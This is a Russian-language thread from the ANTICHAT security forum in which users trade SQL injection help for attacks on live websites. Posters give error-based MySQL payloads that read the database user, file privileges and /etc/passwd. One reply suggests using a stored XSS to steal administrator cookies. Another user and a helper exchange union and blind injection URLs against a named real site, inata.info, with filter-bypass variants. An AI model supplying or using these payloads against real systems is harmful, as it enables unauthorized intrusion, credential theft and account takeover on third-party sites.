ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.01.2016, 22:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
всем привет . помогите человеки добрые
'or
extractvalue(0x0a,concat(0x0a,(select user())))and'#
как проверить права юзера
'or
extractvalue(0x0a,concat(0x0a,(select file_priv))) from+mysql.user and'# даёт ошибку синтекса.
extractvalue(0x0a,concat(0x0a,(select load_file('/etc/passwd'))))and'
Method Not Implemented
GET to /view_cat.php not supported.
могу сайт кинуть. Хочецо научицо . а то sqlХРАП как слепые крутит
|
|
|
|
12.01.2016, 22:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от BabaDook
BabaDook said:
↑
всем привет . помогите человеки добрые
'or
extractvalue(0x0a,concat(0x0a,(select user())))and'#
как проверить права юзера
'or
extractvalue(0x0a,concat(0x0a,(select file_priv))) from+mysql.user and'# даёт ошибку синтекса.
Код:
Code:
'or(extractvalue(1,concat(0x3a,(select(file_priv)from(mysql.user)where(user='BabaDook')limit+0,1))))and'
|
|
|
12.01.2016, 22:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от Konqi
Konqi said:
↑
Код:
Code:
'or(extractvalue(1,concat(0x3a,(select(file_priv)from(mysql.user)where(user='BabaDook')limit+0,1))))and'
Спасибо.
|
|
|
|
13.01.2016, 11:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
13708
Репутация:
0
|
|
Подскажите что можно сделать с этим? когда я вместо ника пишу
Вот ошибка
SQL: INSERT INTO pre_ucenter_members(uid,username,password,email,my id,myidkey,regip,regdate,lastloginip,lastlogintime ,salt,secques) VALUES (28472, ' ', '000', 'none', '', '', '', 1452657744, '0', '0', '111', '')
Error: Duplicate entry ' Errno.: 1062
Там кстати вместо ника если хоть что напишешь,то код вместо ника выполнятся будет,можно что бы простая кнопка была вместо ника)))
|
|
|
|
13.01.2016, 22:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
7147
Репутация:
0
|
|
Скорее всего это XSS уязвимость.
Сообщение от nik1201
nik1201 said:
↑
Там кстати вместо ника если хоть что напишешь,то код вместо ника выполнятся будет,можно что бы простая кнопка была вместо ника))) Выполняться будут HTML и Javascript, PHP интерпретироваться не будет. Уязвимость можно использовать для получения куки администратора или других пользователей, используя их можно зайти под их аккаунтом на сайт.
Сообщение от nik1201
nik1201 said:
↑
Подскажите что можно сделать с этим? когда я вместо ника пишу
Вот ошибка
SQL: INSERT INTO pre_ucenter_members(uid,username,password,email,my id,myidkey,regip,regdate,lastloginip,lastlogintime ,salt,secques) VALUES (28472, ' ', '000', 'none', '', '', '', 1452657744, '0', '0', '111', '')
Error: Duplicate entry ' Errno.: 1062 Ошибка говорит о том, что в таблице есть поле с уникальным значением и данный запрос ее дублирует. При добавке данных скрипт грубо говоря хочет вложить дважды одно и тоже значение в это поле.
Ошибка возникает только при данном логине? Если да, то видимо это поле и является уникальным, и записать еще одну запись с тем же логином сервер не может. Вообщем по экспериментируй с теми данными, что заполняешь. |
|
|
|
13.01.2016, 23:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
542
Репутация:
0
|
|
Сообщение от nik1201
nik1201 said:
↑
Подскажите что можно сделать с этим? когда я вместо ника пишу
Вот ошибка
SQL: INSERT INTO pre_ucenter_members(uid,username,password,email,my id,myidkey,regip,regdate,lastloginip,lastlogintime ,salt,secques) VALUES (28472, ' ', '000', 'none', '', '', '', 1452657744, '0', '0', '111', '')
Error: Duplicate entry ' Errno.: 1062
Там кстати вместо ника если хоть что напишешь,то код вместо ника выполнятся будет,можно что бы простая кнопка была вместо ника))) такой сверхуязвимости я еще не встречал )
|
|
|
|
14.01.2016, 00:41
|
|
Guest
Сообщений: n/a
Провел на форуме:
51991
Репутация:
2
|
|
Сообщение от Ruslord1
Ruslord1 said:
↑
такой сверхуязвимости я еще не встречал ) Просто внедрение html в страницу
|
|
|
|
14.01.2016, 00:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
7147
Репутация:
0
|
|
Добрый вечер!)
Парни, явно нащупал скулю на сайте, а развить никак не получается, застрял в самом начале
http://inata.info/realty/rent/11+order+by+11--/
Но при составлении запроса
http://inata.info/realty/rent/11+UnI...7,8,9,10,11--/
DB query error.
Please try later.
Как только не крутил, не раскручивается. Это видимо некий мод в Битрикс, я посмотрел, что Битрикс может работать как с MySQL так и с Oracle, пробовал итак итак никак. Я так понимаю вопрос в самих union select, видимо фильтр какой то. Пытался по статьям обойти, никаких результатов.
Благодарю!) |
|
|
|
14.01.2016, 12:05
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от ArmusIAm
ArmusIAm said:
↑
Добрый вечер!)
Парни, явно нащупал скулю на сайте, а развить никак не получается, застрял в самом начале
http://inata.info/realty/rent/11+order+by+11--/
Но при составлении запроса
http://inata.info/realty/rent/11+UnI...7,8,9,10,11--/
DB query error.
Please try later.
Как только не крутил, не раскручивается. Это видимо некий мод в Битрикс, я посмотрел, что Битрикс может работать как с MySQL так и с Oracle, пробовал итак итак никак. Я так понимаю вопрос в самих union select, видимо фильтр какой то. Пытался по статьям обойти, никаких результатов.
Благодарю!) - true
на union похоже фильтр стоит, как вариант крутить блинд:
http://inata.info/realty/rent/11+and...),1,1))=5+--+/
При таком запросе ошибка пропадает, но вывода не нашел, возможно в какой-то из колонок нужно корректный параметр поставить:
http://inata.info/realty/rent/11+and+1=0+uNiON sELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63+--+/
|
|
|
|
16.01.2016, 02:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
7147
Репутация:
0
|
|
Спасибо!
Сообщение от winstrool
winstrool said:
↑
возможно в какой-то из колонок нужно корректный параметр поставить:
http://inata.info/realty/rent/11+and+1=0+uNiON sELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63+--+/А в чем преимущество данного запроса? Я так понял, единственное отличие, знак конца строки - %0a. Но после него, что не пиши, сервер не выводит ни объект недвижимости, ни ошибку, даже если кавычку поставить. Что он делает в рамках инъекции? И что ты имеешь ввиду под корректным параметром?
Извини за такое кол-во вопросов, но хочется именно понимать, а не просто взломать. Буду очень признателен) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
